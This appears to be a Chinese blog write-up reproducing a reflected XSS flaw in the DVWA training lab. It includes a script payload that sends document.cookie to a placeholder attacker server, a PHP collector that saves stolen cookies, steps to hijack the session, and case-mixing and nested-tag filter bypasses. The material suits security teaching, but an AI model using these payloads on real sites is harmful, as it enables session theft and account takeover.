XSS漏洞复现

迷南。 2021-09-21 05:16 631阅读 0赞

XSS漏洞复现

实验环境DVWA

XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。对于反射型的XSS,攻击代码是在Http的响应包中。攻击者通过构造含有攻击代码的URL,被攻击者点击后,攻击代码在客户端解释执行。可以通过此恶意代码向攻击者的服务器发送被攻击者的敏感信息,从而实现攻击目的。

下面测试一下,攻击者盗用cookie的实例。

  1. 登录DVWA,将安全等级改为low,选择反射型XSS测试。

在这里插入图片描述

输入123发现会在下方回显输入的内容。

  1. 尝试输入<xss>后发现页面没有回显内容,打开开发者选项查看一下源代码

在这里插入图片描述

发现输入的内容被当做了html的标签来对待了。

  1. 尝试输入一下代码<script>document.location='http://www.baidu.com'</script>发现这段代码被执行了。跳转到了百度的界面。可以判定存在客户端代码执行。
  2. 这里在虚拟机上开启一个web服务,写一个cook.php代码。

    <?php

    1. //用来获得用户的cookie信息
    2. $cookie = $_GET['cookie'];
    3. file_put_contents('cookie.txt',$cookie);

    ?>

  3. 构造攻击url : <script>document.loaction='http://攻击者服务器ip地址/cookie.php?cookie='+document.cookie</script>

  4. 模拟被攻击者去访问一下:localhost:8081/dvwa/vulnerabilities/xss_r/?name=<script>document.loaction='http://攻击者服务器ip地址/cookie.php?cookie='+document.cookie</script>

    注意:name参数需要进行url编码,因为其中含有特殊字符,无法直接传递到后端。这里用hackbar进行编码。

在这里插入图片描述

  1. 查看攻击端的服务器,发现已经得到了用户的cookie

在这里插入图片描述

  1. 尝试用用户的cookie登录一下:(修改PHPSESSID和security)

在这里插入图片描述

  1. 直接访问index.php,发现登录成功了。

在这里插入图片描述

Medium等级

经过测试Medium等级是存在双写绕过和大小写绕过script标签的。

输入:

  1. <ScrIPt>alert(xss)</srcipt>
  2. <scr<script>ipt>alert(xss)</script>

都可以实现绕过

发表评论

表情:
评论列表 (有 0 条评论,631人围观)

还没有评论,来说两句吧...

相关阅读

    相关 MSFThinkphp漏洞

    简介 ThinkPHP是一个快速、兼容而且简单的轻量级国产[PHP开发框架][PHP],诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Ap

    相关 ecshop漏洞分析

    ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 ecshop漏洞复现分析我看se

    相关 fastjson 漏洞

    可能从fastjson“盘古开天地”开始讲,因为我对序列化 反序列化还有那些组件非常不熟悉(谁不搞开发会对这些熟悉)也算复习一下java知识吧,之前好像我自己大二学习java序

    相关 XSS漏洞

    XSS漏洞复现 实验环境DVWA > XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。